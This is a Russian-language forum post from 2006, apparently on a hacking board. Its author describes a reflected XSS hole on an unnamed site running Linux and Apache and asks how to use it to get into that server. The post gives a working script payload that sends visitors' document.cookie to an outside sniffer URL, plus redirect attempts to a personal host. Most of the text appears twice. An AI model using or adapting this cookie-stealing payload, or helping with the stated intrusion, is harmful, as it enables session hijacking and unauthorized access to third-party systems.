Adio
05.06.2006, 15:07
У меня тут такая проблема нашол сайт где можно произвести атаку с JavaScript я вставляю javas code
типа <script>document.location='http://antichat.org/s/sniff.gif?'+document.cookie</script>
Оно отсылает cookies на мой сниффер даже когда я просматриваю ту страничку куда я вставил код там есть мой java script code но оно там не сохраняеться т.е после второго захода кода нет я так понял оно через cookies xss работает.. вот пытался сдеать еще
так
<script>document.location='http://myname.narod.ru/get.txt&c=ls%20-l'</script> мне потом пишет что страница не найдена 404. делаю я без линукс каманд
<script>document.location='http://myname.narod.ru/get.txt</script>
выполнякм мой код тоесть в фрейме нажимаю source html вижу свой get.txt так же и с gif файлами...
Так вот что можно замутить с такой штукой стоит Lnix и apache помойму все на perl так вот нужо пробраться еа сервер я так понял только через cookie подделывать и все..? просто я не супер спец в этих делах но так получилось надо очень..
типа <script>document.location='http://antichat.org/s/sniff.gif?'+document.cookie</script>
Оно отсылает cookies на мой сниффер даже когда я просматриваю ту страничку куда я вставил код там есть мой java script code но оно там не сохраняеться т.е после второго захода кода нет я так понял оно через cookies xss работает.. вот пытался сдеать еще
так
<script>document.location='http://myname.narod.ru/get.txt&c=ls%20-l'</script> мне потом пишет что страница не найдена 404. делаю я без линукс каманд
<script>document.location='http://myname.narod.ru/get.txt</script>
выполнякм мой код тоесть в фрейме нажимаю source html вижу свой get.txt так же и с gif файлами...
Так вот что можно замутить с такой штукой стоит Lnix и apache помойму все на perl так вот нужо пробраться еа сервер я так понял только через cookie подделывать и все..? просто я не супер спец в этих делах но так получилось надо очень..